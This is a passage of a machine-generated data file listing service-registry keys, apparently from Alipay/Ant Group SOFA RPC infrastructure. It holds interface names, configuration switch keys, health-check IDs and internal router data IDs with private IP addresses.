manage.facade.api.GlobalConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:bktranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.77.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.test.service.TestSemanticService:1.0:semantic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowChannelGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.support.recommend.RecommendDataMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.integration.voiceprint.VoiceprintServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.t7701.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.core.velocity.service.VelocityRepositoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.history.MiniAppHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.openevent.OpenEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findataprod.api.FinQualityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.ArgoSystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_mtConfigReviewCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.deploy.ActionStatusQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.variable.VariableRefenceServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.AgreementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.comment.CommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.113.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.taobao.notify.remotingclient.MessageListener:1.0:testTripleMsg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.UserNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pfunddts#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.antgroup.zmxy.zmopenapi.service.facade.ZhiMaCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ActivityFacade4Alsc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.security.auth.facade.role.AuthRoleService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.core.schduler.repository.RunningTaskRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.pagani2.open.sdk.api.service.LaunchTouchService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffxtrade.common.service.facade.api.FxQuoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.customscenter.ccDS.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abnclprod.facade.taskflow.api.config.AbnTaskMapperConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_publish2AfterProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.productBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adbizopt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.merchant.MerchantInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINRISKMNGCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.FixedOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.113.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echannelcenter.common.service.facade.EchannelFeatureQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:overseamng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.creditguarantee.common.service.facade.GuaranteeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxcore.common.service.facade.api.scene.SceneMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.InsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ProductVOQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.UserLevelPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AppToAppCancleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofatest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeexprod.common.service.facade.FpSignConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.datadriven.FeatureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.cacheRetryCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_purchasesQuotationOperate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.prodActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudbox.cloudbox_remote_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icbcenter.service.facade.api.ChargebackJudgeRecoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAYSETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductManagerService:1.0:bic@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaValidateFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.AnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.193.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.234.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.qaZQueue31#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskConfigMngtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isStorePreIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.stocksupervise.common.service.facade.SofitoProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcore.api.ProductApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cdp.common.service.facade.space.query.SpaceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtPcdBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cshall.facade.CsHallConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.traas.model.trigger.ChangeTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.waitServerListSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ssprod.common.service.facade.institution.SocialInstitutionServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_newMechantOcrAddWhite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.resource.ResourceQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.123.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.kmi.common.service.facade.PgpKeyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:CloseAutoPurchaseCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.facade.AntlinkServiceFacade:1.0:antlinkmsdefault@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.admin.api.TemplateMappingAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.HealthCheckService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_supportPackageInfoGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isAsyncStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.share.auto.daointerface.MdataMoveUserDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_REWARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.LotteryOperateLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finrtcalcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antscheduler.facade.IGrayZoneForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insgrid.facade.InsGridFacade:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.loanContractConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cqxjOa_ProcessCallBackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admediamgr.common.service.facade.service.BillQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentfusion.common.service.facade.contentfusion.FeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_GFAC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.tradeRefundRuleRetrieveDefaultNoRefundPds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.OutCardBizDRM.payInBlockSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsign.common.service.facade.base.service.FinsignMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.UcmQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.ScriptDataServiceFacade:1.0:payrms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pointcore.common.service.facade.transfer.AssetPointTransNonTwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.recommend.report.LifeReportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestVideoCallQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.DepositManualSettleIntService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcpcsprod.common.service.facade.management.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcore.common.service.facade.domain.service.MatchDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.CodecCodeScanningRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.cif.common.service.facade.api.UserQueryServiceFacade:1.0:fxwCifService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.api.AlipassVerifyCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.PackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antscanGIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOU------antend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficintelbiz.common.service.facade.api.WorkScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.struct.OraConstraintGroupVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.notify.PushMessageNotifier:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbstaffcenter.common.service.facade.processor.SalarySwitchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.TrPackageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.moneyfund.api.MftransQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","me.ele.newretail.op.brand.service.api.MarketingRightsApiSoaService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstrategy.common.service.facade.portfolio.PortfolioProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.mergeorder.api.AmountDistributeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dqsyncguard.facade.drs.StorageAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.PageTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.mohelper.common.service.facade.MemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.28.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.82.87.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imemberprod.service.facade.api.OauthLifeCycleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.loadTestAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:ecapiprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ContentPageConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ccrInstitutionEnter_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@insptmarket#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mservicesinspect.biz.shared.inspect.service.InspectTaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.biz.service.cooperation.facade.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpSystemConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","bkopenplatform.facade.GoldenCicada:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.common.service.facade.api.ModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.core.service.accbill.autolink.BillAutoLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.subtask.SubTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.simulated.api.SatransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliDbControlFacade:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.QsFinanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.smartant.drm.SmartAntParamDrmManager.maxFinPlanNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.airbops.web.doom.drm.DoomConfig.enableDoomProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.PackageLiabilityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianclaimcore.common.service.InsClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.consumeMessageTurnOff,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcustprod.common.service.facade.api.BizAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.AccountTransFinalizer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilimitcenter.service.facade.manage.api.LimitAccumulateLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.dw.service.LabelManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundTradeTransitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.core.flowswitch.dr.clusterstorage.DataProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ElasticDBSourceMigrateParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushHealthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.AntqTopicFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_C_SECCLIPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:192@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.ResourceDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_BUMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditrmp.facade.riskConsult.PcreditRiskConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianprod.health.service.HealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.BPMSManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdiscount.common.service.facade.api.RuleGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:addTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.SdkConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.addpLoadtestTairRz.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.191.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmerchant.service.facade2.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassetpreference@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.keepConsistentWithYeb,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.65.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwdswp.common.service.facade.rule.CloudCSRegisterRiskRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sync.public#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbreservationprod.common.service.facade.resourceins.ResourceInsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditbfweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:airprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.PromoDayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopCategoryMatchValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jcs.api.service.ClusterService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductCatalogQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:tuningcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cfpcenter.common.service.facade.request.CfpSingleTallyVoucherRequest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.bizservice.UniBizServiceFacade:1.0:ha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PVSOFASERVER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.openDaoDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_os_partnerHandleManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finbaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.bugscan.BugScanOperatorFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.event.common.service.facade.service.EventPropertyService:1.0@D